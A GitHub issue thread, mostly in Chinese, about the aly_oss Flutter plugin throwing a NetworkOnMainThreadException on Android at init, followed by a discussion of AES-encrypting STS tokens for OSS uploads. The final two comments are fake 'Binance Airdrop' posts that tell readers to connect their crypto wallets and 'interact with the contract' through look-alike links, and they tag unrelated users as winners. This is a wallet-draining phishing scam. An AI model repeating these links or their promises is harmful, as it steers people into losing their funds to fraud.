### ISSUE TITLE
调用init的时候，Android控制台会抛出异常

### ISSUE THREAD

**Issue by leoxchang** [flmn/aly_oss#5]
调用init的时候，Android控制台会抛出异常，但是不影响使用

W/System.err(23259): android.os.NetworkOnMainThreadException
W/System.err(23259): 	at android.os.StrictMode$AndroidBlockGuardPolicy.onNetwork(StrictMode.java:1565)
W/System.err(23259): 	at java.net.Inet6AddressImpl.lookupHostByName(Inet6AddressImpl.java:115)
W/System.err(23259): 	at java.net.Inet6AddressImpl.lookupAllHostAddr(Inet6AddressImpl.java:103)
W/System.err(23259): 	at java.net.InetAddress.getByName(InetAddress.java:1106)
W/System.err(23259): 	at com.alibaba.sdk.android.oss.common.utils.OSSUtils.isValidateIP(OSSUtils.java:795)
W/System.err(23259): 	at com.alibaba.sdk.android.oss.OSSImpl.<init>(OSSImpl.java:133)
W/System.err(23259): 	at com.alibaba.sdk.android.oss.OSSClient.<init>(OSSClient.java:116)
W/System.err(23259): 	at tech.jitao.aly_oss.MethodCallHandlerImpl.init(MethodCallHandlerImpl.java:98)
W/System.err(23259): 	at tech.jitao.aly_oss.MethodCallHandlerImpl.onMethodCall(MethodCallHandlerImpl.java:46)
W/System.err(23259): 	at io.flutter.plugin.common.MethodChannel$IncomingMethodCallHandler.onMessage(MethodChannel.java:231)
W/System.err(23259): 	at io.flutter.embedding.engine.dart.DartMessenger.handleMessageFromDart(DartMessenger.java:93)
W/System.err(23259): 	at io.flutter.embedding.engine.FlutterJNI.handlePlatformMessage(FlutterJNI.java:642)
W/System.err(23259): 	at android.os.MessageQueue.nativePollOnce(Native Method)
W/System.err(23259): 	at android.os.MessageQueue.next(MessageQueue.java:336)
W/System.err(23259): 	at android.os.Looper.loop(Looper.java:174)
W/System.err(23259): 	at android.app.ActivityThread.main(ActivityThread.java:7356)
W/System.err(23259): 	at java.lang.reflect.Method.invoke(Native Method)
W/System.err(23259): 	at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:492)
W/System.err(23259): 	at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:930)

**Comment by ShengjieGeng** [comment]
今天尝试flutter 接入oss，
确实init会有这个异常但不影响使用。
顺便想问下，我们Android之前接入的oss，获取token是我们服务端帮忙获取的
![image](https://user-images.githubusercontent.com/18364968/80452156-3d7dbf80-8958-11ea-8e14-7955edf15fe2.png)
所以，flutter是要自己获取token吗

**Comment by leoxchang** [comment]
不需要，提供一个token获取的服务端地址就行

**Comment by ShengjieGeng** [comment]
> 不需要，提供一个token获取的服务端地址就行

大佬，您是调通了是吗，
![image](https://user-images.githubusercontent.com/18364968/80453621-386e3f80-895b-11ea-85fe-137cd320f1f7.png)

![image](https://user-images.githubusercontent.com/18364968/80453475-f0e7b380-895a-11ea-9322-e12cd5cbedec.png)
小弟不太明白这个key和iv怎么搞的，所以就空着，您能给指导一下吗？
感激不尽

**Comment by leoxchang** [comment]
key是aes加密key，iv是ase加密的偏移量

**Comment by ShengjieGeng** [comment]
这些两个参数要找我们的服务端要吗

**Comment by leoxchang** [comment]
![image](https://user-images.githubusercontent.com/4852704/80453902-bc282c00-895b-11ea-8e18-8e0834911a44.png)

**Comment by leoxchang** [comment]
获取的sts是是加密的，所以服务端要做aes加密

**Comment by ShengjieGeng** [comment]
> 获取的sts是是加密的，所以服务端要做aes加密
问了我们后台，他们不知道有AES加密这回事，所以也不清楚这个。
![image](https://user-images.githubusercontent.com/18364968/80457127-62c2fb80-8961-11ea-8773-6bf130714188.png)
![image](https://user-images.githubusercontent.com/18364968/80457161-6f475400-8961-11ea-9dc1-be65cf0e3902.png)
我就随便添加了这两个参数。
不太清除您给的截图，那个截图是服务断做的吗

**Comment by leoxchang** [comment]
对，服务端要给sts接口要做加密，然后把加密的key和iv给前端就行了

**Comment by beyondbkcy** [comment]
搞这么复杂干什么，太难用了，sts是什么东西？

**Comment by ShengjieGeng** [comment]
> 搞这么复杂干什么，太难用了，sts是什么东西？

上传oss服务器用的
https://user-images.githubusercontent.com/18364968/80452156-3d7dbf80-8958-11ea-8e14-7955edf15fe2.png
让你们后台写一个接口，返回json格式按照这个图片的结构进行aes加密，后台拿着这个加密方法加密：https://user-images.githubusercontent.com/4852704/80453902-bc282c00-895b-11ea-8e18-8e0834911a44.png

**Comment by sandeep661** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by minholee-itruck** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @winzingggggg, @Han0nly, @zsmatrix62, @StellaLii, @SYanalyser, @evantre, @libiubiuya
